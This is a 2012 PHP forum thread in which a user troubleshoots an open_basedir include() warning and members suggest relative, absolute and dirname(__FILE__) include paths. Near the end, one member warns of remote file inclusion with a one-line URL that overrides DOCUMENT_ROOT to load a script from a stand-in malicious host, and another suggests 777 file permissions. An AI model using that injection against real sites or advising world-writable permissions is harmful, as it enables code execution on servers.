homepage Welcome to WebmasterWorld Guest from 54.161.155.142
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Visit PubCon.com
Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
Forum Library, Charter, Moderators: coopster & jatar k

PHP Server Side Scripting Forum

    
PHP Warning: include()
AlexB77




msg:4403821
 1:08 am on Jan 5, 2012 (gmt 0)

Hi Guys,

has anyone ever had similar problem like the one below:

PHP Warning: include() [<a href='function.include'>function.include</a>]: open_basedir restriction in effect. File(../includes/templates.php) is not within the allowed path(s): (/var/www/vhosts/example.com/httpdocs:/tmp) in /var/www/vhosts/example.com/httpdocs/includes/right_navigation.php on line 1


I am on the VPS and webhost just simply refuses to provide any help with it. Would appreciate if anyone can help and give me some sort of a guide line on where to begin?

 

Habtom




msg:4403831
 2:00 am on Jan 5, 2012 (gmt 0)

Is your includes directory outside of your root directory as you have specified: "../includes/templates.php"

If it is in your root directory, then that line should be this:
"includes/templates.php"

If that doesn't work, look for solutions to configure httpd.conf to remove the restrictions on what files PHP can access.

lostdreamer




msg:4404065
 3:18 pm on Jan 5, 2012 (gmt 0)

It seems to me you are doing something like the following:

/
/index.php
/includes/right_navigation.php
/includes/templates.php

Where / is the root, and index.php (or some other file in the root folder) is including the right_navigation.php

right_navigation.php is trying to include the file templates.php from the same folder.


BUT because you are including the right_navigation.php from a file in your ROOT folder, all includes will be relative to ROOT, not INCLUDES

2 ways to fix:

1) in right_navigation.php change
include("../includes/templates.php");
with
include("includes/templates.php");

2) Allways when including files, use the ABSOLUTE PATH, not a relative one.... This will keep you from getting in a lot of trouble....
ie:
include( dirname(__FILE__) ."/templates.php");
or
include("(/var/www/vhosts/example.com/httpdocs/includes/templates.php");


Good luck

rocknbil




msg:4404106
 5:37 pm on Jan 5, 2012 (gmt 0)

I am on the VPS


(/var/www/vhosts/example.com/httpdocs:/tmp)


Either add your include directory via the hosting CP settings or you can disable openbasedir. In WHM, you can look for the "PHP Open Basedir Tweak"

AlexB77




msg:4404152
 7:44 pm on Jan 5, 2012 (gmt 0)

He guys, thanks for your help, but nothing seems to be working. Let me give more details about the site structure here, may be this can help to clear this mess out:

Site Structure:


/httpdocs
___/somefiles/
______index.html (<?php include ("../includes/templates.php");?> this how I am using it in the main index.html in my root folder, by the way this does not work, works only if <?php include ("../includes/111.php");?> or<?php include ("../includes/222.php");?> and so on.)
___/someotherfiles/
______index.html (same as above)
___/includes/
______templates.php (see content of this file below)
______right_navigation.php (see content of this file below)
______111.php
______222.php
______333.php
______aaa.php
______bbb.php
______ccc.php
___/images/
___/JavaScripts/
___index.html (<?php include ("includes/templates.php");?> this how I am using it in the main index.html in my root folder, by the way this does not work, works only if <?php include ("includes/111.php");?> or<?php include ("includes/222.php");?> and so on.)
___contact_us.html


"please do not pay attention to the underscore (___) lines before file names, this is just to show the structure"



Content of "templates.php" file


<?php include ("../includes/111.php");?>
<?php include ("../includes/222.php");?>
<?php include ("../includes/333.php");?>


Content of "right_navigation.php"


<?php include ("../includes/aaa.php");?>
<?php include ("../includes/bbb.php");?>
<?php include ("../includes/ccc.php");?>


I pretty sure I am doing something that should not be done the way I did it, so the question is how to do it right?

Your help as always much appreciated.

lostdreamer




msg:4404363
 8:18 am on Jan 6, 2012 (gmt 0)

Like I said, the easiest way:

1) Open all the PHP files in the "includes" folder.
2) Find all lines that say "../includes"
3) Remove the "../" so it only says include("includes/aaa.php");

You are thinking that the path (../includes/filename.php) is relative from the "includes" folder, but it isnt.... It's looking for that folder from the FIRST php file that is including stuff (in this case /index.html)

Good luck

incrediBILL




msg:4404374
 9:08 am on Jan 6, 2012 (gmt 0)

Are these files hosted on a server using a control panel like Plesk or cPanel?

Nobody seems to be addressing the fact that your error message specifies that you requested the correct path according to your description of the hierarchy:
"/var/www/vhosts/example.com/httpdocs/includes/right_navigation.php"

Which is why the openbasedir error concerns me because that subdirectory shouldn't be getting that error for the path specified.

Try moving the files to the httpdocs folder and see if it will include them from there, then check the access rights on your includes folder and files, try 777 if on the folder first then the file itself, shouldn't need it but I've seen weird stuff happen for no reason.

Another way to attempt addressing this problem is to use an absolute include path:

include( $_SERVER['DOCUMENT_ROOT'] . '/includes/aaa.php' );

lostdreamer




msg:4404378
 9:24 am on Jan 6, 2012 (gmt 0)

He is not requesting the correct path

In includes/right_navigation.php he has

include("../includes/111.php");

But the file right_navigation is being included in the ROOT of the ftp.
He should not be using ../ in there.


But you are right, the best way is using absolute paths like with

include( $_SERVER['DOCUMENT_ROOT'] . '/includes/aaa.php' );


Just remember, the $_SERVER variable CAN be overridden.... This is why I tent to use the dirname(__FILE__) method.

AlexB77




msg:4404659
 11:44 pm on Jan 6, 2012 (gmt 0)

First of all, I would like to thank you all guys for providing best help that you definitely would not find elsewhere.

@lostdreamer

I have done exactly as you suggested include("(/var/www/vhosts/example.com/httpdocs/includes/templates.php"); and it worked for me.

I am not quite familiar with second option that you have also suggested dirname(__FILE__). I just do not know how to apply this method. If you can explain in little more details, would really help.

@incrediBILL

Thanks for your help, is there potential risk of security in the method that you suggested? For instance some pages on my site can be visible when you searching bing images, since it shows origin of the picture (meaning web page where this picture is located). Would this not mess it all up?

incrediBILL




msg:4404673
 12:59 am on Jan 7, 2012 (gmt 0)

@lostdreamer whoops, you are correct, it was late and I misread the message, in the light of a new day I see the error and the error in my interpretation of the problem.

All I know is my method would work most of the time ;)

Thanks for the heads up on dirname(__FILE__). I'm an old time programmer and well versed in CGI stuff, just newer to PHP so some of it's quirks still get past me. Hopefully soon I'll be up to speed on all the PHP nuances, quirks and annoyances but of course they'll roll out an update that'll create a whole new set about then!

s there potential risk of security in the method that you suggested?


Nope.

Using my method to make an absolute path is perfectly safe.

Security issues only arise if you have to escalate file rights to 755/777 like I suggested, which is usually only a problem when writing to files and not reading. Even then the security issue is usually coming from within the server, not from the outside, so I wouldn't be too concerned unless you share a server with a bunch of hackers and if that's the case you're already in trouble!

lostdreamer




msg:4405134
 8:40 am on Jan 9, 2012 (gmt 0)

@ incrediBILL :

I'm sorry to say their is a HUGE security risk with your way....

$_SERVER['DOCUMENT_ROOT'] is a variable that (in a lot of PHP configs) can be overridden by URL / Cookie etc. values if register globals is turned on.

So something like:
/page?_SERVER[DOCUMENT_ROOT]=hxxp://malicioussite.com/badscript.txt
Would actually include the badscript.txt instead of your own files.

This has been fixed in PHP 4.2+ if I'm not mistaking.


Regards,
LostDreamer

incrediBILL




msg:4405153
 10:20 am on Jan 9, 2012 (gmt 0)

This has been fixed in PHP 4.2+ if I'm not mistaking.


Considering I don't support PHP 4 at all, code bails in anything < PHP 5, and if I'm not mistaken register_globals is deprecated in 5.3, you can see why it really isn't a concern for me if it's fixed in PHP 4.2+

Kind of like saying there's a bug to be aware of in Windows because of a glitch in MSDOS 3.3 ;)

lostdreamer




msg:4405514
 11:23 am on Jan 10, 2012 (gmt 0)

Just thought it was worth mentioning here since a LOT of people just copy paste code from one place to another....

You would be surprised at how many injection attacks are still possible because of this....

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved